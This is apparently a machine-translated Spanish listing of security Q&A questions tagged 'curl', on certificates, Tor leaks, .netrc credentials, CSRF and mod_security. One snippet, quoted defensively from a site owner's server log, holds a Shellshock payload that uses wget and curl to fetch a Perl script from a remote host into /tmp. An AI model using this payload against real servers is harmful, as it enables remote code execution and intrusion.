Preguntas con etiqueta 'curl'

1
respuesta

¿Por qué no hay error de certificado al visitar google.net aunque presenta un certificado emitido para google.com?

La siguiente salida muestra que google.net está presentando un certificado que se ha emitido a www.google.com . $ openssl s_client -connect google.net:443 < /dev/null > out.txt 2>&1; cat out.txt depth=2 /C=US/O=GeoTru...
hecha 10.07.2017 - 05:55
6
respuestas

¿Cómo puedo inspeccionar de forma segura un sitio web potencialmente malicioso?

A veces me interesa lo que hay detrás de un sitio web malicioso. ¿Cómo me mantengo en el lado seguro si decido inspeccionar? Estoy buscando métodos que sean más rápidos y simples que ejecutar el sitio web en una máquina virtual. ¿Debo usar cU...
hecha 26.04.2016 - 19:04
2
respuestas

¿Es una vulnerabilidad permitir la solicitud de rizos sin filtros desde un sitio web?

Recientemente estuve en un sitio web que proporcionaba alguna característica sin sentido: Introduce una URL presiona enter Se muestra la fuente HTML de una URL dada Básicamente recuperó una URL y simplemente volcó el contenido de la m...
hecha 01.08.2015 - 16:05
1
respuesta

Evidencia de Shellshock Exploit: ¿es este un ataque exitoso?

Estuve revisando los registros hoy y noté lo siguiente: 62.219.116.107 - - [26/Dec/2016:15:16:08 -0100] "GET / HTTP/1.0" 200 13501 "-" "() { :;}; /bin/bash -c \"wget http://[redacted]/bo.pl -O /tmp/bo.pl;curl -o /tmp/bo.pl http://[redacted]/b...
hecha 27.12.2016 - 02:36
1
respuesta

¿Se puede filtrar la dirección IP real usando curl a través de Tor?

Habiendo visto Tor a través de Python. ¿Puede la fuga de la dirección IP real? Ya no estoy seguro de si usar o no    curl -L --insecure -C - --socks5 localhost: 9150 -H "User-Agent:" check.torproject.org es tan seguro como la versión...
hecha 03.07.2017 - 19:55
1
respuesta

Hacer que el servidor devuelva "No se puede dividir la máscara de red de la expresión de destino"

Estoy interesado en hacer que mi sitio web sea mucho más seguro y, mientras reproduzco otros sitios web, encontré que un sitio web responde a los comandos de la consola nmap traceroute , curl y wget en un de manera que...
hecha 11.08.2016 - 15:43
2
respuestas

¿Existe alguna técnica efectiva de prevención del lado del servidor contra CSRF asistida por PHP?

Empezaré por decirlo: soy simplemente un entusiasta de la ciberseguridad, no un experto. Por lo tanto, voy a decir lo que creo que sé hasta ahora, no dude en corregirme en cualquier momento. A través de mis lecturas, he venido a aprender sobr...
hecha 23.05.2016 - 17:06
2
respuestas

¿Es seguro usar archivos .netrc para almacenar credenciales para herramientas como curl o ftp?

El archivo .netrc puede contener credenciales de nombre de usuario y contraseña para varios sitios, para permitir una invocación más sencilla de herramientas. Por ejemplo, curl con la opción -n leerá las credenciales del archivo, para el sitio d...
hecha 21.07.2015 - 23:41
1
respuesta

Evitar la suplantación de identidad del servidor remoto con PHP y cURL

Estoy escribiendo un script PHP que solicita datos confidenciales de un servidor remoto. Estoy usando cURL para obtener la información del certificado del servidor remoto (para su salida, consulte a continuación). ¿Qué claves de matriz necesi...
hecha 27.10.2012 - 22:43
1
respuesta

Mod_security para Apache2 bloquea cURL!

Estoy intentando que mis usuarios se queden latentes. y lng. desde su dirección mediante la API de geocodificación de Google, pero cuando mod: security está habilitado, lo impide y el script se agota. ¿Cómo puedo agregar una excepción por IP o d...
hecha 26.06.2011 - 01:16